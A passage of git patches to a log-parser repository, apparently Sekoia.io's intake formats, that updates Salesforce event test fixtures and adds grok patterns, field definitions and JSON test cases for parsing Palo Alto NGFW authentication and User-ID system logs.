   set_source_ip:
diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
index c6a4ab44a..2250f3670 100644
--- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
+++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
@@ -1,9 +1,9 @@
 {
   "input": {
-    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}"
+    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}"
   },
   "expected": {
-    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}",
+    "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}",
     "event": {
       "category": [
         "network"
@@ -46,7 +46,8 @@
       },
       "user": {
         "type": "Standard"
-      }
+      },
+      "user_agent": 12024001
     },
     "source": {
       "address": "1.2.3.4",
@@ -57,16 +58,6 @@
     },
     "user": {
       "id": "user123123123123"
-    },
-    "user_agent": {
-      "device": {
-        "name": "Other"
-      },
-      "name": "Other",
-      "original": "9999",
-      "os": {
-        "name": "Other"
-      }
     }
   }
 }
\ No newline at end of file
diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
index bc1c801cf..051638d22 100644
--- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
+++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
@@ -100,7 +100,8 @@
       "user": {
         "initiated_logout": true,
         "type": "admin"
-      }
+      },
+      "user_agent": 0
     },
     "source": {
       "address": "1.2.3.4",
@@ -117,16 +118,8 @@
       "id": "00530000009M943"
     },
     "user_agent": {
-      "device": {
-        "name": "Other"
-      },
       "name": "Chrome",
-      "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36",
-      "os": {
-        "name": "Windows",
-        "version": "10"
-      },
-      "version": "93.0.4577"
+      "version": "93.0.4577.82"
     }
   }
 }
\ No newline at end of file

From ab6c2fa267e5098698435037d4609a1e83dde638 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Wed, 6 Nov 2024 15:36:23 +0100
Subject: [PATCH 201/317] Add some additional groks

---
 .../paloalto-ngfw/_meta/fields.yml            | 15 ++++
 .../paloalto-ngfw/ingest/parser.yml           | 24 +++++-
 .../paloalto-ngfw/tests/system_csv.json       |  9 ++-
 .../tests/test_event_reason.json              | 51 +++++++++++++
 .../tests/test_event_reason1.json             | 61 +++++++++++++++
 .../tests/test_event_reason2.json             | 74 +++++++++++++++++++
 .../tests/test_event_reason3.json             | 74 +++++++++++++++++++
 7 files changed, 305 insertions(+), 3 deletions(-)
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json

diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml
index 7c526334c..3f149e4a5 100644
--- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml	
@@ -307,3 +307,18 @@ paloalto.threat.type:
   description: The type of the threat
   name: paloalto.threat.type
   type: keyword
+
+paloalto.vsys:
+  description: The virtual system
+  name: paloalto.vsys
+  type: keyword
+
+paloalto.authetification.profile:
+  description: The authentication profile
+  name: paloalto.authetification.profile
+  type: keyword
+
+paloalto.server.profile:
+  description: The server profile
+  name: paloalto.server.profile
+  type: keyword
diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index bf144527c..d09e6e308 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -438,7 +438,7 @@ pipeline:
       properties:
         raise_errors: false
         input_field: "{{parsed_event.message.EventDescription}}"
-        pattern: "%{SYSTEM_AUTH_AUTHENTICATION_FOR}|%{CONNECTION}|%{CONTENT}|%{WILDFIRE}|%{NETWORK}|%{PANDB_GENERIC}|%{CLOUD_ELECTION}|%{AUTHENTICATION}"
+        pattern: "%{SYSTEM_AUTH_AUTHENTICATION_FOR}|%{CONNECTION}|%{CONTENT}|%{WILDFIRE}|%{NETWORK}|%{PANDB_GENERIC}|%{CLOUD_ELECTION}|%{AUTHENTICATION}|%{REASON1}|%{REASON2}|%{REASON3}|%{REASON4}|%{REASON5}"
         custom_patterns:
           SYSTEM_AUTH_AUTHENTICATION_FOR: "authenticated for user '%{USERNAME:user}'.   auth profile '%{DATA:auth_profile}', vsys '%{DATA:vsys}', server profile '%{DATA:server_profile}', server address '%{HOSTNAME:server_address}', From: %{IP:src}."
           CONNECTION: "%{CONNECTION_SUCCESS}|%{CONNECTION_TO_SERVER}|%{CONNECTION_REGISTERED}"
@@ -463,6 +463,11 @@ pipeline:
           AUTHENTICATION: "%{AUTHENTICATION_CONSOLE}|%{AUTHENTICATION_WEB}"
           AUTHENTICATION_CONSOLE: "authenticated for user '%{USERNAME:user}'.   From: %{IP:src}."
           AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}"
+          REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}'
+          REASON2: 'ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}'
+          REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}"
+          REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}"
+          REASON5: 'authenticated for user %{WORD:user}\.   auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.'
     filter: '{{parsed_event.message.get("EventDescription") != None}}'
 
   - name: parsed_threat
@@ -535,6 +540,10 @@ stages:
           destination.ip: "{{parsed_description.message.dst}}"
         filter: "{{parsed_description.message.dst  | is_ipaddress}}"
 
+      - set:
+          destination.ip: "{{parsed_description.message.destination_ip}}"
+        filter: "{{parsed_description.message.destination_ip  | is_ipaddress}}"
+
       - set:
           destination.nat.ip: "{{parsed_event.message.destinationTranslatedAddress}}"
         filter: "{{parsed_event.message.destinationTranslatedAddress | is_ipaddress}}"
@@ -567,6 +576,10 @@ stages:
           event.code: "{{ parsed_threat.message.threat_code }}"
         filter: "{{ parsed_threat.get('message') != None }}"
 
+      - set:
+          event.reason: "{{ parsed_description.message.reason }}"
+        filter: "{{ parsed_description.message.get('reason') != None }}"
+
       - set:
           destination.port: "{{parsed_event.message.DestinationPort or parsed_event.message.dpt or parsed_description.message.dport}}"
           destination.user.name: "{{parsed_event.message.duser or parsed_event.message.DestinationUser}}"
@@ -578,7 +591,7 @@ stages:
           event.dataset: "{{parsed_event.message.DeviceEventClassID|lower or parsed_event.message.Type|lower or parsed_event.message.LogType|lower}}"
           event.module: "{{parsed_description.message.module}}"
           host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
-          host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}"
+          host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}"
           host.id: "{{parsed_event.message.deviceExternalId}}"
           host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
           host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
@@ -673,6 +686,10 @@ stages:
           source.ip: "{{parsed_description.message.src}}"
         filter: "{{parsed_description.message.src | is_ipaddress}}"
 
+      - set:
+          source.ip: "{{parsed_description.message.source_ip}}"
+        filter: "{{parsed_description.message.source_ip | is_ipaddress}}"
+
       - set:
           source.nat.ip: "{{parsed_event.message.NATSource}}"
         filter: "{{parsed_event.message.NATSource | is_ipaddress}}"
@@ -732,6 +749,9 @@ stages:
           paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}"
           paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}"
           paloalto.threat.name: "{{parsed_threat.message.threat_description}}"
+          paloalto.vsys: "{{parsed_description.message.vsys}}"
+          paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}"
+          paloalto.server.profile: "{{parsed_description.message.server_profile}}"
       - set:
           paloalto.threat.type: >
             {%- set id = parsed_threat.message.threat_code | int -%}
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
index 3e52f494c..70c22f924 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
@@ -35,7 +35,14 @@
       "DGHierarchyLevel3": "0",
       "DGHierarchyLevel4": "0",
       "EventID": "auth-success",
-      "Threat_ContentType": "auth"
+      "Threat_ContentType": "auth",
+      "authetification": {
+        "profile": "GP"
+      },
+      "server": {
+        "profile": "LDAP"
+      },
+      "vsys": "vsys123"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json
new file mode 100644
index 000000000..d0c6195a9
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json	
@@ -0,0 +1,51 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    },
+    "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00"
+  },
+  "expected": {
+    "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "User-ID server monitor test05(vsystest) Access denied",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-25T14:04:52.574000Z",
+    "action": {
+      "name": "connect-server-monitor-failure",
+      "type": "userid"
+    },
+    "host": {
+      "name": "test05"
+    },
+    "log": {
+      "hostname": "FFFFF01",
+      "level": "high",
+      "logger": "system"
+    },
+    "observer": {
+      "name": "FFFFF01",
+      "product": "PAN-OS",
+      "serial_number": "024101011111"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "connect-server-monitor-failure",
+      "Threat_ContentType": "userid",
+      "vsys": "vsystest"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json
new file mode 100644
index 000000000..105b28d45
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json	
@@ -0,0 +1,61 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    },
+    "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00"
+  },
+  "expected": {
+    "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-25T14:10:48.575000Z",
+    "action": {
+      "name": "connect-ldap-sever",
+      "type": "userid"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8"
+    },
+    "log": {
+      "hostname": "FFFFFF01",
+      "level": "informational",
+      "logger": "system"
+    },
+    "observer": {
+      "name": "FFFFFF01",
+      "product": "PAN-OS",
+      "serial_number": "024101010000"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "connect-ldap-sever",
+      "Threat_ContentType": "userid"
+    },
+    "related": {
+      "ip": [
+        "0.0.1.1",
+        "5.6.7.8"
+      ]
+    },
+    "source": {
+      "address": "0.0.1.1",
+      "ip": "0.0.1.1"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json
new file mode 100644
index 000000000..65221596d
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json	
@@ -0,0 +1,74 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    },
+    "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0"
+  },
+  "expected": {
+    "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "system",
+      "reason": "When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2024-10-22T06:54:17.012000Z",
+    "action": {
+      "name": "auth-success",
+      "type": "auth"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8"
+    },
+    "log": {
+      "hostname": "FWPAN01",
+      "level": "informational",
+      "logger": "system"
+    },
+    "observer": {
+      "name": "FWPAN01",
+      "product": "PAN-OS",
+      "serial_number": "024101011111"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "auth-success",
+      "Threat_ContentType": "auth",
+      "authetification": {
+        "profile": "FFFF"
+      },
+      "server": {
+        "profile": "SERVER_TEST"
+      },
+      "vsys": "shared"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ],
+      "user": [
+        "joe1595"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "name": "joe1595"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json
new file mode 100644
index 000000000..8f64d342d
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json	
@@ -0,0 +1,74 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    },
+    "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979.   auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00"
+  },
+  "expected": {
+    "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979.   auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "system",
+      "reason": "authenticated for user joe979.   auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2024-10-22T07:29:30.605000Z",
+    "action": {
+      "name": "auth-success",
+      "type": "auth"
+    },
+    "destination": {
+      "address": "1.7.4.4",
+      "ip": "1.7.4.4"
+    },
+    "log": {
+      "hostname": "FFFF01",
+      "level": "informational",
+      "logger": "system"
+    },
+    "observer": {
+      "name": "FFFF01",
+      "product": "PAN-OS",
+      "serial_number": "024101011111"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "auth-success",
+      "Threat_ContentType": "auth",
+      "authetification": {
+        "profile": "FFFF"
+      },
+      "server": {
+        "profile": "server-test"
+      },
+      "vsys": "shared"
+    },
+    "related": {
+      "ip": [
+        "1.2.2.7",
+        "1.7.4.4"
+      ],
+      "user": [
+        "joe979"
+      ]
+    },
+    "source": {
+      "address": "1.2.2.7",
+      "ip": "1.2.2.7"
+    },
+    "user": {
+      "name": "joe979"
+    }
+  }
+}
\ No newline at end of file

From 4d53a344d73bccb51f2aa191ce2909ce32fbdb66 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Wed, 6 Nov 2024 15:38:10 +0100
Subject: [PATCH 202/317] Apply linter

---
 .../paloalto-ngfw/_meta/fields.yml            | 20 +++++++++----------
 .../tests/test_event_reason.json              |  4 ++--
 .../tests/test_event_reason1.json             |  4 ++--
 .../tests/test_event_reason2.json             |  4 ++--
 .../tests/test_event_reason3.json             |  4 ++--
 5 files changed, 18 insertions(+), 18 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml
index 3f149e4a5..e42125a42 100644
--- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml	
@@ -258,6 +258,11 @@ paloalto.authentication.method:
   name: paloalto.authentication.method
   type: keyword
 
+paloalto.authetification.profile:
+  description: The authentication profile
+  name: paloalto.authetification.profile
+  type: keyword
+
 paloalto.connection.method:
   description: Identifies how the GlobalProtect app connected to the the Gateway
   name: paloalto.connection.method
@@ -278,6 +283,11 @@ paloalto.endpoint.serial_number:
   name: paloalto.endpoint.serial_number
   type: keyword
 
+paloalto.server.profile:
+  description: The server profile
+  name: paloalto.server.profile
+  type: keyword
+
 paloalto.source.private.ip:
   description: Private IP address
   name: paloalto.source.private.ip
@@ -312,13 +322,3 @@ paloalto.vsys:
   description: The virtual system
   name: paloalto.vsys
   type: keyword
-
-paloalto.authetification.profile:
-  description: The authentication profile
-  name: paloalto.authetification.profile
-  type: keyword
-
-paloalto.server.profile:
-  description: The server profile
-  name: paloalto.server.profile
-  type: keyword
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json
index d0c6195a9..dda76e854 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00",
     "sekoiaio": {
       "intake": {
         "dialect": "Palo Alto NGFW",
         "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
       }
-    },
-    "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00"
+    }
   },
   "expected": {
     "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00",
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json
index 105b28d45..477b06aa6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00",
     "sekoiaio": {
       "intake": {
         "dialect": "Palo Alto NGFW",
         "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
       }
-    },
-    "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00"
+    }
   },
   "expected": {
